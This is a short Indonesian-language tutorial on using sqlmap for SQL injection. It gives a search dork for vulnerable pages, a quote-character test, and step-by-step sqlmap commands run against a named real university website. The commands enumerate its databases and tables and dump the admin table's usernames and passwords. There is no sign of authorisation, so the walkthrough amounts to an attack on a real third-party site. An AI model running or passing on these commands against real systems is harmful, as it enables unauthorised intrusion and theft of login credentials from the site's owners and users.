Begini cara menggunakan sqlmap pemula - Sqlmap merupakan tools untuk melakukan eksploitasi Sql Injection.
1. dorking sesuai dengan metode yang akan di gunakan. Disini saya akan menggunakan metode Sql injection. Dork : inurl:detail-dosen.php?id=
2. masuk web kemudian cek apakah vuln terhadap sql inject atau tidak.
- tes dengan karakter ‘ terdapat data yang hilang.
3. selanjutnya menggunakan sqlmap, command yang digunakan
(sqlmap -u "http://data.fmipa.unand.ac.id/matematika/web/detail-dosen.php?id=1*" --random-agent --threads 10 –dbs) terdapat database yang ada di web tersebut.
4. mendapatkan data tabel di database matematika (qlmap -u "http://data.fmipa.unand.ac.id/matematika/web/detail-dosen.php?id=1*" --random-agent --threads 10 -D matematika --tables)
5. mengambil data admin untuk login (sqlmap -u "http://data.fmipa.unand.ac.id/matematika/web/detail-dosen.php?id=1*" --random-agent --threads 10 -D matematika -T admin -C username,password,level,blokir --dump)